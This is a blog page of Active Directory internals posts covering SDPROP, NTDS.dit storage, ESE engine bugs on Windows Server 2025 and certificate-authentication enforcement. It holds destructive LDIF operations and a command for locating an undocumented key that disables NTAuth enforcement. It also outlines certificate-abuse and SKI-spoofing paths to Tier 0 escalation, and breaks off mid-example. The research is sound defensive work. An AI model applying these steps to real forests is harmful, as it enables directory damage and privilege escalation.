Inside Active Directory: Misconceptions, Myths and Bugs (Part 1) – SDP

The Hybrid Identity Protection Conference (HIP) Europe 2026 in Frankfurt took place last week, and I presented my session “Inside Active Directory: Misconceptions, Myths and Bugs”.

The session is now available online: Inside Active Directory: Misconceptions, Myths, and Bugs

I would like to start by summarizing the first subject I covered in the session – the Security Descriptor Propagation Daemon (SDP), also known as SDPROP. It has long been a misconception that SDPROP is a process/task belonging to, or in any way specific to, AdminSDHolder – it is NOT; AdminSDHolder is merely one of many consumers of SDPROP, e.g. when a change is made to an object’s nTSecurityDescriptor attribute (Modify an object’s securityDescriptor).

Here is a write-up on the subject, even on microsoft.com, that is completely wrong and mixes up AdminSDHolder and SDPROP:
Appendix C: Protected Accounts and Groups in Active Directory | Microsoft Learn

There are 100+ articles, blog posts and presentations that have gotten this wrong over the years, but I want to highlight a write-up that describes AdminSDHolder very well: AdminSDHolder: Misconceptions, Misconfigurations, and Myths – SpecterOps – all credit to Jim Sykora for this write-up.

You can also see that I mentioned this already on this blog in the “How the Active Directory – Data Store Really Works (Inside NTDS.dit) – Part 3” post from 2012.

Like my session, this post will focus solely on what SDPROP is responsible for, and I will try to cover how it works.

SDPROP runs independently on each DC (yes, even RODCs) and is responsible for the following:

  • Propagates inheritable ACEs in an SD down the tree and merges the SD with the parent SD
  • Fixes up the ancestry in the Active Directory database (DIT)
    • ResetRDN (this is because an index used to enumerate children changes)
    • ResetDN
    • Lost parent in a replication conflict
    • Conflict between a reference phantom and a structural phantom
  • Patches GUID-less objects if they have a SID

I did a demo in the session where I used SDPROP to patch up a GUID-less object. On a functional domain controller there should be no need to invoke SDPROP manually, but it can be triggered using a RootDSE modify operation – fixupInheritance.

Warning 1:
If you need to make a GUID-less object for testing purposes, you can make one in a dedicated test forest, DO NOT ATTEMPT to create a GUID-less object in a production forest.

Warning 2:
SDPROP can only patch a GUID-less object if the object has a SID, so this can only be done against a security principal – this is because the GUID is calculated based on the SID. Why is that? Because SDPROP runs independently on each domain controller, and they must all be able to set the very same GUID.
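The actual derivation Active Directory uses is internal and not shown here; purely as an illustration of the deterministic property (NOT the real algorithm), a name-based UUIDv5 over the SID string gives every DC the same result with no coordination:

```python
import uuid

# Illustrative only: Active Directory's real SID-to-GUID derivation is
# internal. The point is determinism - any pure function of the SID yields
# the same GUID on every DC, so each DC can patch the object independently.
NAMESPACE = uuid.UUID("00000000-0000-0000-0000-000000000000")  # hypothetical namespace

def guid_for_sid(sid: str) -> uuid.UUID:
    # uuid5 = SHA-1 based, name-derived UUID: same input -> same output
    return uuid.uuid5(NAMESPACE, sid)

# Two independent "DCs" computing the GUID for the same SID agree:
print(guid_for_sid("S-1-5-21-1-2-3-1106") == guid_for_sid("S-1-5-21-1-2-3-1106"))  # True
```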

Create GUID-less object
dn:
changetype: modify
add: schemaUpgradeInProgress
schemaUpgradeInProgress: 1
-

dn: CN=ULF,OU=GUIDLess,DC=dstest,DC=chrisse,DC=com
changetype: modify
delete: objectGUID
-

If you want to enqueue a propagation for the entire tree, this can be done by setting ‘fixupInheritance’ to ‘1’; don’t do this in a production forest unless you know what you’re doing.

EnqueuePropagation for the entire tree
 dn:
 changetype: modify
 add: fixupInheritance
 fixupInheritance: 1
 -

There is also a possibility to invoke SDPROP on a specific object; however, the object must be identified by DNT. For the concept of DNTs, please see – “How the Active Directory – Data Store Really Works (Inside NTDS.dit) – Part 2”

To find an object’s DNT without the need to dump the entire DIT, there is, since Windows Server 2012, another RootDSE modify operation – ‘dumpReferences’ – that can be used to translate between DN and DNT for objects. (This works because all objects (not phantoms) keep a reference to themselves via the DN attribute.)

Dump References for DN
 dn:
 changetype: modify 
 add: dumpReferences 
 dumpReferences: CN=ULF,OU=GUIDLess,DC=dstest,DC=chrisse,DC=com
 -

On the targeted domain controller you will get a text file in the same location as your Active Directory database (NTDS.dit) file, for example C:\Windows\NTDS\, named ntds.ref.dmp – the content should look like this:

ntds.ref.dmp
Non-linked references to CN=ULF,OU=GUIDLess,DC=dstest,DC=chrisse,DC=com

DNT	Attribute(s)
5559	distinguishedName

Once we have obtained the DNT of the object via the self-reference in the DN attribute, we can proceed and trigger SDPROP on that specific object using its DNT.

EnqueuePropagation for specific object using DNT
 dn:
 changetype: modify
 add: fixupInheritance
 fixupInheritance: dnt:5559
 -

If the object was GUID-less, you should now see that it has a GUID assigned to it again, and the domain controller should have logged this:

Get GUID fix event
Get-WinEvent -LogName 'Directory Service' -MaxEvents 10 | Where-Object {$_.id -eq '2084'} | ft -Property Message -Wrap

This pretty much covers what I showed in the presentation; now let’s deep dive into SDPROP and look at how it works (something you can’t do in a 40-minute session).

Implementation in the Active Directory database (NTDS.DIT) – SDPROP implements the following table: sdproptable

The columns of the “sdproptable” (column – introduced – description):

  • order_col – Windows 2000 – This is the primary key
  • begindnt_col – Windows 2000 – This is the DNT the propagation begins at
  • trimmable_col – Windows 2000 – Indicates if this propagation can be merged with another propagation
  • clientid_col – Windows 2000 – The thread that enqueued the propagation; if enqueued by the SDPROP thread itself, the client id is 0xFFFFFFFF, in all other cases it is the thread state client id
  • flags_col – Windows Server 2003 – This column holds a set of flags, or no flags at all
  • checkpoint_col – Windows Server 2003 – This column contains a list of DNTs (containers) and children to process, as well as a list of dead ends if the propagation encountered any issues. Note: the propagation must run long enough for a checkpoint to be saved. Note: the format changed in SP1
  • unsafe_ancestors_col – Windows Server 2008 – If the propagation hasn’t finished and one or more objects have changed their parent-child relation, this is not yet reflected in the ancestors_col; therefore a list of “unsafe” ancestors is saved that would otherwise result in false-positive parent-child relations. Note: this column is multi-valued and contains each DNT as its own value; reading all iTagSequence values is required to get the full list of DNTs. Note: the last DNT in the list must match the DNT in the ‘begindnt_col’

Here is a screenshot of what the “sdproptable” looks like when dumped with ESEDump:

So is there a way to read the data out of the “sdproptable” from the “outside” using LDAP or any other APIs? Yes, sort of.

You can use the RootDSE attribute “pendingPropagations” as documented here – 3.1.1.3.2.15 pendingPropagations

However, this can only retrieve pending propagations that were caused or enqueued by the same thread as the current LDAP connection, i.e. the thread whose id matches the “clientid_col”.
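Reading that attribute from PowerShell via ADSI can be sketched like this (an illustrative sketch; note it only returns something on the very connection/thread that enqueued a propagation):

```powershell
# Read the constructed RootDSE attribute 'pendingPropagations' via ADSI.
# Only propagations enqueued by the same thread as this LDAP connection are
# returned (matching clientid_col), so trigger the propagation and read the
# attribute on the same connection.
$rootDse = [ADSI]"LDAP://RootDSE"
$rootDse.RefreshCache(@("pendingPropagations"))
$rootDse.Properties["pendingPropagations"]
```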

The “dSCorePropagationData” non-replicated attribute and its relation to SDPROP

The “dSCorePropagationData” attribute gets updated by SDPROP with timestamps when SDPROP is working on the object, together with a set of flags associated with the stamps or with the object/phantom.

Since Windows Server 2008, a propagation is always enqueued even if the SD hasn’t changed (is bitwise equal to the already existing SD), unless the 14th character of dSHeuristics is set, aka fDontPropagateOnNoChangeUpdate – as documented here – 6.1.1.2.4.1.2 dSHeuristics. As this is FALSE by default on Windows Server 2008 and later, a timestamp is written into “dSCorePropagationData” even if the SD didn’t change.
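As a small helper (my own sketch, not any official tooling), checking whether a given 1-based dSHeuristics character position is set can be done like this; characters missing at the end of the string count as '0' (off):

```python
def dsheuristics_char_set(dsheuristics: str, position: int) -> bool:
    """True if the 1-based character at `position` is set (anything but '0').

    dSHeuristics is a string of single-character switches; a string shorter
    than `position` means the switch defaults to '0' (off).
    """
    if dsheuristics is None or len(dsheuristics) < position:
        return False
    return dsheuristics[position - 1] != '0'

# fDontPropagateOnNoChangeUpdate is position 14 (per the [MS-ADTS] reference above);
# position 10 must always be '1' in any dSHeuristics string that long.
print(dsheuristics_char_set("00000000010001", 14))  # True - switch 14 is '1'
print(dsheuristics_char_set("", 14))                # False - defaults to off
```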

This attribute has the syntax String(Generalized-Time) and is multi-valued; the first value holds the flags and the other values hold a maximum of 4 timestamps. The following flags can be associated with each timestamp or with the object:
SDP_NEW_SD = 0x01
SDP_NEW_ANCESTORS = 0x02
SDP_TO_LEAVES = 0x04
SDP_ANCESTRY_INCONSISTENT_IN_SUBTREE = 0x08
SDP_ANCESTRY_BEING_UPDATED_IN_SUBTREE = 0x10

If there is a need to write a 5th timestamp into the “dSCorePropagationData” attribute, the 2nd value is overwritten together with its corresponding flags.
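A quick helper (a sketch of mine) to turn a raw flags value into the flag names listed above:

```python
# Flag values as listed above for dSCorePropagationData
SDP_FLAGS = {
    0x01: "SDP_NEW_SD",
    0x02: "SDP_NEW_ANCESTORS",
    0x04: "SDP_TO_LEAVES",
    0x08: "SDP_ANCESTRY_INCONSISTENT_IN_SUBTREE",
    0x10: "SDP_ANCESTRY_BEING_UPDATED_IN_SUBTREE",
}

def decode_sdp_flags(value: int) -> list[str]:
    """Decode a dSCorePropagationData flags value into a list of flag names."""
    return [name for bit, name in sorted(SDP_FLAGS.items()) if value & bit]

print(decode_sdp_flags(0x18))
# ['SDP_ANCESTRY_INCONSISTENT_IN_SUBTREE', 'SDP_ANCESTRY_BEING_UPDATED_IN_SUBTREE']
```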

You can view this attribute using LDP; it decodes the timestamps and the flags, but it does not pair the flags with the timestamps.

Looking at the same object using ESEDump:

The flags:
SDP_ANCESTRY_INCONSISTENT_IN_SUBTREE | SDP_ANCESTRY_BEING_UPDATED_IN_SUBTREE signal to the Active Directory query optimization code that the ancestors index isn’t safe to use for subtree searches, as SDPROP is working on bringing it to a consistent state and it might generate false positives.

Security Descriptor (SD) – Single Instance Storage (SIS) in the Active Directory database (NTDS.dit)

It’s time to go through the full set of possible parameters of the RootDSE modify operation ‘fixupInheritance’ – but before we can do that, we need to understand single-instance storage of security descriptors in the Active Directory database (NTDS.dit) and how it was implemented and introduced with Windows Server 2003.

Before the introduction of the “sd_table” every SD was stored on each object’s row within the “datatable” – directly in the “ATTp131353 / nTSecurityDescriptor” column.

Once the “sd_table” was introduced in Windows Server 2003, SDs were MD5-hashed and placed in the “sd_table” instead of the “datatable” – leaving only a reference in the “datatable” pointing to the row storing the SD in the “sd_table”. If an SD to be inserted into the “sd_table” was identical to an already stored SD, that existing row was referenced instead.

This is of course much more efficient – it saves up to 40% of space according to How to upgrade Windows 2000 domain controllers to Windows Server 2003 – Windows Server | Microsoft Learn – and gives more room for other data to be stored on the row in the “datatable” representing the object or phantom.
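To make the single-instance scheme concrete, here is a toy sketch in Python (names and structure are mine, not the on-disk format): SDs are keyed by MD5, and inserting an SD that already exists just returns the existing row’s SDID. A real implementation would also compare the full SDs on a hash hit to guard against collisions.

```python
import hashlib

class SdTable:
    """Toy single-instance store for security descriptors, keyed by MD5,
    sketching the Windows Server 2003 sd_table scheme described above
    (illustrative only - not the actual on-disk format)."""

    def __init__(self):
        self._rows = {}        # sdid -> (refcount, sd bytes)
        self._by_hash = {}     # md5 digest -> sdid
        self._next_sdid = 1

    def insert(self, sd: bytes) -> int:
        digest = hashlib.md5(sd).digest()
        sdid = self._by_hash.get(digest)
        if sdid is not None:                  # identical SD already stored:
            count, stored = self._rows[sdid]  # just bump the reference count
            self._rows[sdid] = (count + 1, stored)
            return sdid
        sdid = self._next_sdid                # first time we see this SD:
        self._next_sdid += 1                  # store it on a new row
        self._rows[sdid] = (1, sd)
        self._by_hash[digest] = sdid
        return sdid

t = SdTable()
a = t.insert(b"O:DAG:DAD:(A;;GA;;;SY)")
b = t.insert(b"O:DAG:DAD:(A;;GA;;;SY)")  # duplicate SD -> same SDID referenced
print(a == b)  # True
```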

So why did we have to touch this to understand more parameters of the RootDSE modify operation ‘fixupInheritance’?

In [MS-ADTS] 3.1.1.3.3.10 fixupInheritance – the following is documented:

In Windows Server 2003 operating system and later, setting the fixupInheritance attribute to the special values “forceupdate” and “downgrade” has effects outside the state model.

The “downgrade” value has the effect that all SDs are moved out of the “sd_table” and back into the “datatable”, onto each object’s or phantom’s row, as it was in a Windows 2000-style DIT 🙂

So in a fairly modern Active Directory database (NTDS.dit), aka post-Windows 2000 Server, the “ATTp131353 / nTSecurityDescriptor” column in the “datatable” will look like this:

If we look up the SDID reference in the “sd_table”, we will find the actual SD:

Warning: Do not test or perform this operation in a production environment

Let’s try the RootDSE modify operation ‘fixupInheritance’ with the parameter set to “downgrade”

Force SDs back into the datatable
 dn:
 changetype: modify
 add: fixupInheritance
 fixupInheritance: downgrade
 -

Let’s have a look again at the same object in the “datatable”

Same SD but now stored directly in the “datatable” – I don’t expect you to compare the SDs but they do match 🙂

I don’t think I need to go into what the “forceupdate” parameter is doing.

Some old but good real-world scenarios related to SDPROP and the Active Directory database

I presented this at my first HiP Conf in 2017 in my session – “Inside the Active Directory database (NTDS.DIT)” – That is almost 10 years ago.

Case 1

The funny thing here is that I added the -GetRecordSize option to ESEDump to troubleshoot this very issue; it calls into the JetGetRecordSize function of the ESENT API.

Now, in Windows Server 2025, this is available natively as an attribute – msDS-JetGetRecordSize3 – which calls into a later version of JetGetRecordSize than I did; JetGetRecordSize3 doesn’t seem to be publicly documented yet.

This is how it looks in ESEDump:

Case 2

The SDID reference between the “datatable” and the “sd_table” broke; the SDID stored for that object in the “datatable” pointed to a non-existent row in the “sd_table”.

By the way, the database semantic checker would have patched up the GUID-less object as well, but that would have required taking the DC offline.

LDP.exe fails on me – crash dump analysis and resolution

For some time, LDP.exe had just been crashing for me on my Windows 11 laptop. I can connect and bind successfully, but as soon as I want to view an object or tree, ldp.exe just crashes.

So I decided to capture and analyze the crash dump.

So what is going on here? The function takes the following parameters: BerEncode(CtrlInfo *ci, PBERVAL pBerVal)

The CtrlInfo struct holds some info about an LDAP control.
pBerVal is just an LDAP_BERVAL (winldap.h) – Win32 apps | Microsoft Learn

This led me to check the controls loaded in ldp.exe – what is that?

Something I’ve never entered, at least – that is for sure. But how did it end up there?

It turned out that if “HKEY_CURRENT_USER\Software\Microsoft\Ldp\Controls\ControlCount” gets out of sync and contains a value that’s higher than the number of controls actually saved, ldp.exe picks up this kind of garbage data and crashes!
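A quick way to inspect (and bluntly reset) the saved state – a sketch, assuming you are fine with ldp.exe recreating its saved controls from scratch:

```powershell
# Inspect LDP's saved control count
$key = 'HKCU:\Software\Microsoft\Ldp\Controls'
(Get-ItemProperty -Path $key).ControlCount

# If ControlCount is higher than the number of controls actually saved under
# the key, ldp.exe reads garbage and crashes. The blunt fix: delete the key
# and let ldp.exe start over with no saved controls.
Remove-Item -Path $key -Recurse
```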

Debugging something that isn’t an issue in an NTDS.dit

I tried to dump an NTDS.dit from an RODC with ESEDump – something I hadn’t done in years – and stumbled upon NDNCs (Non-Domain Naming Contexts) appearing twice in ‘msDS-HasInstantiatedNCs’. ESEDump did work as expected, but I started to question whether my code walking the range in the “link_table” worked correctly.

I then thought that this must have something to do with the fact that this RODC was promoted from IFM. Let’s have a look at that attribute with repadmin.exe

Yep, those are my two ‘duplicated’ NDNCs – but why? I wrote two articles in the past about how IFM works and almost covered this, but missed it in the first part, as it was focusing solely on Windows Server 2003 – it says:

Sourcing NDNCs with Windows Server 2003 is only supported by Windows Server 2003 SP1 or later under the following conditions:

  • Both the DC you’re sourcing the IFM from and the machine intending to become a DC using the sourced IFM must be running at least Windows Server 2003 SP1 or later.
  • The forest functional level (FFL) has to be: Windows Server 2003 (pre-Windows Server 2003 FFL, adding replicas to NCs has to be done on the Domain Naming Master – FSMO)
    Note: The promotion completes with the sourced IFM even if the forest functional level (FFL) is less than Windows Server 2003, but NDNCs aren’t sourced from the IFM and the following will happen:

The DomainDNSZones and ForestDNSZones are replicated back in over the wire using normal replication, as the promoted DC (sourced from IFM) hosts the DNS Service

I forgot to mention that it’s not supported to keep any NDNCs in the DIT for the Read-Only Domain Controller IFM case – those get whacked and replicated back in again.

Link to the article How install from media (IFM) really works (Part 1) – Christoffer Andersson

The solution here, if I really only want PRESENT links, would be to change the indices over the “link_table” to the “present” ones, depending on forward or backlinks; the Recycle Bin was not enabled in this environment.

C#
EseHelper.JetSetCurrentIndex(sesid, tableid, /*"link_index"*/ "link_present_index");
EseHelper.JetSetCurrentIndex(sesid, tableid, /*"backlink_index"*/ "backlink_present_index");

8k page size DITs on Windows Server 2025 and NTDSUTIL might make your DC unbootable

Not all DITs on Windows Server 2025 are 32k page size (yes, I know – I did say that in my last blog post); there are two exceptions. 1: The IPU case, aka in-place upgrade of a pre-Windows Server 2025 DC – in that case the DB will remain as-is in terms of page size.

You can verify the actual page size of a Windows Server 2025 DSA using the new attribute msDS-JetDBPageSize.
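A sketch of reading it with the AD PowerShell module, assuming the attribute is exposed on the DSA (nTDSDSA) object and must be requested explicitly:

```powershell
# Hypothetical retrieval - assumes msDS-JetDBPageSize lives on the DSA object
$dsa = (Get-ADRootDSE).dsServiceName
Get-ADObject -Identity $dsa -Properties msDS-JetDBPageSize |
    Select-Object Name, 'msDS-JetDBPageSize'
```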

This clearly shows us that the page size of the one and only DSA running Windows Server 2025 is 8k – this is because the DIT comes from an IPU’ed, aka in-place-upgraded, Windows Server 2022 DC.

Let’s have a look with esentutl /m C:\Windows\NTDS\NTDS.dit

For sure, the DIT is 8k page size; we can also validate by its DB signature that it was created back in 2017. Compare with the Distribution DIT, which is 32k page size and was created in 2023 – more on the Distribution DIT can be found here.

So how do we get to 32k page size on this DC? The answer is: you can’t, unless you demote and re-promote it. You can get to Windows Server 2025 DFL and FFL – but you can’t enable the “Database 32k pages” feature.

There is also a second way to end up with additional Windows Server 2025 DCs running 8k page size DITs.

If you produce IFM media from a Windows Server 2025 DC with 8k page size, the Windows Server 2025 DCs you promote using that IFM media are also going to have 8k page size DITs.

IPU-DC-02 is promoted using an IFM produced from IPU-DC-01, which once was IPU’ed (in-place-upgraded) from Windows Server 2022.

Extensible Storage Engine – ESENT and the Engine Format Version

Somewhere between Windows 10 19H1 (version 1903, released in May 2019) and Windows 10 20H1 (version 2004), ESENT got support for something called the “Engine Format Version” (EFV), which enables specific features depending on the ESE engine version. By default, if an ESE DB is attached by a more recent engine than the one it was initially created on, the DB and its logs are upgraded to the current ESE engine version. That might break backwards compatibility: an older version of the ESE engine (an older operating system supporting only certain Engine Format Versions) may no longer be able to attach the DB. This is the default, aka:

ESENT.h
#define JET_efvUseEngineDefault             (0x40000001)    //  Instructs the engine to use the maximal default supported Engine Format Version. (default)

However, the Active Directory DSA (ntdsai.dll) has decided to also support databases (DITs) that don’t even support the EFV (Engine Format Version), by setting a hard version of:

ESENT.h
#define JET_efvWindows19H1Rtm                   8920        //  Last pre-efv version, shipped in Windows 10 until 19H1 release.

This sort of came up and got awareness in the outside world via Michael Grafnetter, when someone used his incredible tool DSInternals to attach a DIT and the default – JET_efvUseEngineDefault – was used. It upgraded the DIT, and when the Active Directory DSA (ntdsai.dll) tried to attach it again, the DIT had an EFV (Engine Format Version) that was way ahead of its hardcoded JET_efvWindows19H1Rtm.

Oops – the DIT can no longer be used by the Active Directory DSA (ntdsai.dll).

ESENT error -623 is JET_errEngineFormatVersionSpecifiedTooLowForDatabaseVersion

This was resolved by setting the JetSetSystemParameter JET_paramEngineFormatVersion to JET_efvUsePersistedFormat before attaching the database – Michael figured out that this was how esentutl would do it. DSInternals got updated, and I updated my ESEDump tool in pretty much the same way:

ESEDump source
if (DbInfoMisc.dwBuildNumber >= 20348)
    err = E.Check(EseHelper.JetSetSystemParameter(ref instance, EseHelper.JET_sesidNil, new IntPtr(EseHelper.JET_paramEngineFormatVersion), new IntPtr(EseHelper.JET_efvUsePersistedFormat), null));

What happened to NTDSUTIL.exe and 8k size DITs?

For some reason, if you use ntdsutil.exe against an 8k page size DIT on Windows Server 2025 and it attaches your DIT, it’s going to destroy your DIT and your DC will never boot again – guess what? It upgrades your DB beyond EFV (Engine Format Version) 8920 (JET_efvWindows19H1Rtm). This is NOT good and is another bug in Windows Server 2025.

If you’re on Windows Server 2025 with 8k page size DITs – stay away from ntdsutil.exe, and especially the files context; it will destroy your DIT. Or, to be honest, stay away from 8k page size DITs on Windows Server 2025 to begin with.

Update 2025-11-07: Microsoft responded quickly and seriously to this issue and a fix is already on its way. Also note that the DIT is not corrupted in any way, so data is NOT lost; it’s just upgraded to a later version, and the DSA refuses to attach the DIT as Active Directory doesn’t support that ESE EFV (Engine Format Version).

Active Directory – 32k pages DIT and the JET_bitSetUniqueMultiValues issue (The real Exchange Schema Issue)

After HIP Conf 25 – and after meeting some people from the AD team and having good discussions – I thought it would be nice to deep dive into what I love the most: Active Directory and its internal workings. I decided to dig into this issue, which has been sent to me a lot, with people asking what I think about it: Active Directory schema extension issue if you use a Windows Server 2025 schema master role | Microsoft Community Hub

So what is going on here – a bad Exchange schema upgrade that causes replication to fail? At first you might think that’s the case – it’s NOT, according to me, although I do hold that the Exchange schema upgrade does something bad [1] – let’s get back to that later.

So when can this disaster strike? If you’re running Exchange adprep to extend your Active Directory schema for the first time, aka the forest had no previous versions of the Exchange schema extensions – nope, nothing happens, regardless of the versions of your DCs, including a Schema FSMO running Windows Server 2025.

If you run adprep and have ALREADY extended your schema for Exchange previously, and the Schema FSMO is running Windows Server 2025 – then you run into issues. But what really happens?

Attributes with the syntax 2.5.5.2 aka String(Object-Identifier) suddenly accept duplicates – and here it’s time to tell what Exchange is doing badly [1]: Exchange adprep never checks if a value is already present in those attributes; instead, on each update (CU/release), it tries to add the same value again, relying on AD throwing it out with ATT_OR_VALUE_EXISTS. Below we can see how that works when the Schema FSMO is held by a Windows Server 2008 R2 DC:

But this will be allowed on Windows Server 2025?

That is not good – and it will break Active Directory replication on the receiving end if it’s a down-level DC (e.g. not Windows Server 2025 [2]); the update will apply only one of the duplicates, e.g. the duplicate detection will work. So let’s look up our example class, ‘Address-Book-Container’, on the Schema FSMO and on another DC.

Why will it not break replication to other Windows Server 2025 DCs? Well they suffer from the same duplication bug – or do they really? [2]

This is how it looks on a down-level DC (e.g. not Windows Server 2025):

And of course it’s a schema mismatch when the definition of a class differs between two replicas – one with two values for the attribute auxiliaryClass (2) country;country while the other only has auxiliaryClass (1) country;

Well, let’s go a step beyond this and leave Exchange for a while; let’s add our own attribute (chDsObjid) with the syntax 2.5.5.2 aka String(Object-Identifier).

Windows Server 2025 DC

Windows Server 2022 DC

So the same behavior – however this will not cause a schema mismatch and break replication, only bring inconsistency.

So what is wrong here – something must be wrong with Active Directory’s duplicate detection logic on Windows Server 2025 [2], or?

Let’s again look at how it should work – we should be thrown out if we’re trying to add a value that already exists on an attribute with syntax 2.5.5.2 aka String(Object-Identifier).

We are, and it works as expected on a down-level DC (e.g. not Windows Server 2025) – we get a DSID that can give us a pointer to where this is blocked in the DS source. I happen to know that AD has its own duplicate-value detection for certain syntaxes, but not for 2.5.5.2 aka String(Object-Identifier) – here Active Directory relies solely on the Extensible Storage Engine – ESENT/Jet – for duplicate value detection.

JetSetColumn is called with grbit JET_bitSetUniqueMultiValues = 0x00000080 – this seems to fail on Windows Server 2025? [2]
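For reference, the call in question can be sketched with the ManagedEsent wrapper (Microsoft.Isam.Esent.Interop); the handles and the value are illustrative – this is not ESEDump’s or the DSA’s actual code:

```csharp
// Sketch: sesid/tableid/columnid are handles from an already-open ESE
// session and table; the value is an illustrative OID string.
byte[] data = Encoding.Unicode.GetBytes("1.2.840.113556.1.5.125");
Api.JetPrepareUpdate(sesid, tableid, JET_prep.Replace);
// SetColumnGrbit.UniqueMultiValues maps to JET_bitSetUniqueMultiValues:
// ESE itself should reject the update if the value already exists in the
// multi-valued column - the check that misbehaves on 32k-page DITs.
Api.JetSetColumn(sesid, tableid, columnid, data, data.Length,
    SetColumnGrbit.UniqueMultiValues, null);
Api.JetUpdate(sesid, tableid);
```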

I felt I had to try this out myself at the Extensible Storage Engine – ESE level, so what the heck – how hard can it be to modify ESEDump to do writes to the DIT?

So let’s try this and see if we’re thrown out by ESE – first with a Windows Server 2022 DIT (8k):

Yes, that works as expected; now let’s try the very same code on a Windows Server 2025 DIT (32k):

Oops – something must be wrong within the Extensible Storage Engine – ESE (ESENT.dll): we’re getting through here even though we’re calling JetSetColumn with grbit JET_bitSetUniqueMultiValues and a value that is already present in the column.

But let’s try a DIT from Windows Server 2022 (8k) on Windows Server 2025 🙂 We’re thrown out with the ESENT error: A duplicate value was detected on a unique multi-valued column.

But wait – wasn’t Windows Server 2025 supposed to be broken, or have some defect in ESENT.dll?

My understanding is that this has to do with the page size of the NTDS.dit database: JET_bitSetUniqueMultiValues doesn’t work correctly on 32k-page DBs and never has, no matter the underlying operating system – it just so happens that on Windows Server 2025 all NTDS.dit databases are 32k pages.

But wait – shouldn’t the database only become 32k pages once the “Database 32k pages” optional feature has been enabled? No – again, all NTDS.dits on Windows Server 2025 are 32k pages by default; the “Database 32k pages” optional feature only lets go of restrictions enforced to be able to co-exist with down-level replicas (e.g. non-Windows Server 2025 DCs).

[2] The issue has nothing to do with Active Directory – it seems to be a bug in Extensible Storage Engine – ESENT (ESENT.dll)

Summary

It took me a day to figure out and test this, including writing a version of ESEDump that could prove it. Exchange should check for the values it is trying to add and not rely on Active Directory throwing an error that the value already exists.

How can you find affected attributes? Run the following AD query against your Schema NC:

PowerShell
Get-ADObject -SearchBase (Get-ADRootDSE).schemaNamingContext -LDAPFilter "(&(attributeSyntax=2.5.5.2)(isSingleValued=FALSE))"

It is possible to fix this if you run into it – without doing a forest recovery. Please contact Microsoft Support and they will help you get back into a supported state. I know how to get out of this as well – but I’m not Microsoft, nor do I work for Microsoft; I’m just an Active Directory geek who likes to figure out how things work, or don’t work.

When your Enterprise PKI becomes one of your enemies (Part 8)

So the security updates for October have arrived, and the “AllowNtAuthPolicyBypass” registry key is now gone from kdcsvc.dll – all CAs that issue certificates to be used for PKINIT against Active Directory must now be trusted in NTAuth.

Please do not add CAs to NTAuth that you don’t trust, as anyone who can issue a certificate with a subject of choice from those CAs can still impersonate any user account within your forest, e.g. a DA/EA – and this is regardless of StrongCertificateBindingEnforcement and NTAuthEnforcement.

A good solution to keep NTAuth safe is NTAuthGuard by Carl Sörqvist.


Read more about the NTAuthGuard solution – how to set it up and get all the required content – on Carl’s GitHub: https://github.com/CarlSorqvist/PsCertTools/tree/main/NTAuthGuard

But as I usually say, there is always a secret key – as with “StrongCertificateBindingEnforcement”, another key (replacing “AllowNtAuthPolicyBypass”) can be used to – unsupported, as far as I know – turn off the NTAuthEnforcement requirement. You will find it by using:

.\strings.exe -n 5 -o -f 671232 C:\Windows\system32\kdcsvc.dll

But do not use it – you will be subject to vulnerabilities. However, this new regkey has two modes:

  1. If set to “0”, it will just silently ignore whether the CA is in NTAuth or not
  2. If set to “1”, it will log Event 45 for the KDC

By the way my session at HIPConf25 on this subject is now available online for everyone to watch:
Enterprise PKI Today: Friend or Foe? – Hip Conf

When your Enterprise PKI becomes one of your enemies (Part 7)

Hybrid Identity Protection (HIP) Conference 2025 is over and I presented on the Active Directory and PKI subject again: “Enterprise PKI Today: Friend or Foe”

Now available to watch online: Enterprise PKI Today: Friend or Foe? – Hip Conf

StrongCertificateBindingEnforcement vs NTAuthEnforcement

StrongCertificateBindingEnforcement has been mandatory since the 10th of September 2025, with no supported way of opting out to Compatibility Mode. Enforcing this took over 3 years – and we’re still not done – and the ‘StrongCertificateBindingEnforcement’ registry key is gone from “kdcsvc.dll” with the September updates. However, there is a new key available to still opt out, but that key is only intended for special cases and should NOT be used; you can find it by string-dumping “kdcsvc.dll” at a specific offset.

.\strings.exe -n 5 -o -f 671232 C:\Windows\system32\kdcsvc.dll

Please be aware that StrongCertificateBindingEnforcement only protects you from what it was designed for – the following:

  1. dNSHostName/servicePrincipalName computer owner abuse: remove the DNS SPNs from servicePrincipalName, steal the DNS hostname of a DC, put it in your computer account’s dNSHostName attribute, request a cert, authenticate (PKINIT) with the cert, and you’re a DC.
  2. Overwrite userPrincipalName of user to be of target to hijack user account since the missing domain part does not violate an existing UPN
  3. Overwrite userPrincipalName of user to be @ of target to hijack machine account since machine accounts don’t have a UPN
  4. Delete userPrincipalName of user and overwrite sAMAccountName to be without a trailing $ to hijack a machine account

Note: 2-4 would require permissions to write to the ‘userPrincipalName’ attribute

It will NOT protect you from:

  1. CAs trusted in your forest where you don’t have a good security hygiene for issuance of certificates
    • If someone can issue a certificate with subject + sid they own that security principal in your Active Directory Forest.
    • Subject + SID in AltSubject is sadly enough – tag:microsoft.com,2022-09-14:sid:<value>
    • If you’re using Authentication Mechanism Assurance (AMA) – you must control/prevent issuance with specific issuance policies.
  2. Bad certificate template hygiene
    • Supply in the request (SITR) should never be published on a CA trusted in NTAuth
    • Write access to certificate templates outside Tier 0 allows for SITR to be enabled.
  3. 3rd party/standalone CAs or RA’s/EA’s – you’re on your own to block the above.

NTAuthEnforcement

Since July, NTAuthEnforcement has been enabled by default, meaning that all CAs that issue certificates to be used for PKINIT must be trusted in NTAuth – this changes the picture.

Before this new requirement, it was possible to be trusted for PKINIT even if the issuing CA was not trusted in NTAuth – if a strong mapping method via AltSecID (altSecurityIdentities) was used. This is no longer possible after CVE-2025-26647: X509SKI (Subject Key Identifier), for example, was considered a strong mapping, but it is possible to create a certificate with a designated SKI (Subject Key Identifier) from any trusted CA. This becomes problematic, as you could craft the SKI (Subject Key Identifier) of an existing mapped user – a T0 administrator, for example – and become that security principal within the forest.

In my past post “When your Enterprise PKI becomes one of your enemies (Part 6)” I demonstrate how to create, distribute and force-trust your own fake CA within a forest to perform a T1-to-T0 privilege escalation – at that time leveraging Authentication Mechanism Assurance (AMA).

But let’s use CVE-2025-26647 instead; let’s say we found a T0 account “strongly” mapped with an SKI (Subject Key Identifier) within the Active Directory forest.

Looking something like this:

Dn: CN=Carl Sörqvist (A0),OU=Tier0,DC=nttest,DC=chrisse,DC=com
accountExpires: 9223372036854775807 (never); 
altSecurityIdentities: X509:<SKI>C97FACAFD474A962253C5EF55E72ED712B788905; 
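The X509:&lt;SKI&gt; mapping compares only the hex-encoded SKI bytes. A minimal Python sketch (the parsing logic is my own) of how such an altSecurityIdentities value breaks down:

```python
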